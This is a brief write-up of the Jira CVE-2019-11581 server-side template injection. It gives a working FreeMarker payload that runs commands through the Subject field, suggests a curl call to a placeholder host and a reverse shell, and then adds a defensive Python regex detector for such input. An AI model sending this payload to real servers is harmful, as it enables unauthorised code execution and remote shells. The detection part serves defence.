RCE in Jira (CVE-2019-11581)
The "Contact Administrators" functionality is accessible at this URL:
https://jiraserver/secure/ContactAdministrators!default.jspa
The Subject field of that form is vulnerable to server-side template injection (FreeMarker):
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('cmd').waitFor()
For example, the command can be:
curl http://<ip>:<port>/
to test whether the server can make an outbound HTTP request, or
python -c ''
to execute commands such as a reverse shell.
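Because the payload above is ordinary FreeMarker expression syntax submitted through a form field, a defender can flag such input before it reaches the template engine or when reviewing submitted subjects. The following is an added example, not code from the original write-up or from Jira: it assumes the Subject value is available as a plain string and scores it against the FreeMarker constructs the payload relies on (interpolation, chained method calls on a variable, directives, and the Java reflection calls that reach the runtime). The sample subjects are constructed; only the payload prefix comes from the page.

```python
import re
from typing import Dict, List

# Each rule is (name, compiled regex). The syntax targeted is FreeMarker's:
# ${...} interpolations, <#...> directives, $var.method( chained calls, and the
# Java reflection calls that turn a template expression into code execution.
RULES = [
    ("interpolation", re.compile(r"\$\{[^}]*\}")),
    ("method_call", re.compile(r"\$[A-Za-z_]\w*\s*\.\s*[A-Za-z_]\w*\s*\(")),
    ("directive", re.compile(r"<#\w+")),
    ("reflection", re.compile(r"\.getClass\s*\(|\bforName\s*\(|\bgetRuntime\b|\.exec\s*\(")),
]


def template_injection_indicators(value: str) -> List[str]:
    """Return the names of every rule that fires on a single form field value."""
    return [name for name, rx in RULES if rx.search(value)]


def is_suspicious(value: str) -> bool:
    """True if the field value carries any template-expression indicator."""
    return bool(template_injection_indicators(value))


def scan_subjects(subjects: List[str]) -> Dict[str, List[str]]:
    """Map each suspicious subject to the indicators that fired; clean inputs are omitted."""
    report: Dict[str, List[str]] = {}
    for subject in subjects:
        hits = template_injection_indicators(subject)
        if hits:
            report[subject] = hits
    return report


# Constructed sample inputs (not from the original page, apart from the payload
# prefix): what a defender might see submitted as the form's Subject field.
SAMPLE_SUBJECTS = [
    "Cannot log in after password reset",
    "Invoice total is $50, please confirm",
    "$i18n.getClass().forName('java.lang.Runtime')",
    "${7*7}",
    "<#assign cmd = 'x'>",
]

if __name__ == "__main__":
    for subject, hits in scan_subjects(SAMPLE_SUBJECTS).items():
        print(f"SUSPICIOUS {hits}: {subject!r}")
```

The dollar sign alone is not treated as an indicator (the "$50" subject passes), so the check stays usable on real help-desk traffic. Pattern matching of this kind is a detection and logging aid for the period before the fixed Jira version is deployed; it does not replace applying the vendor patch or disabling the Contact Administrators form.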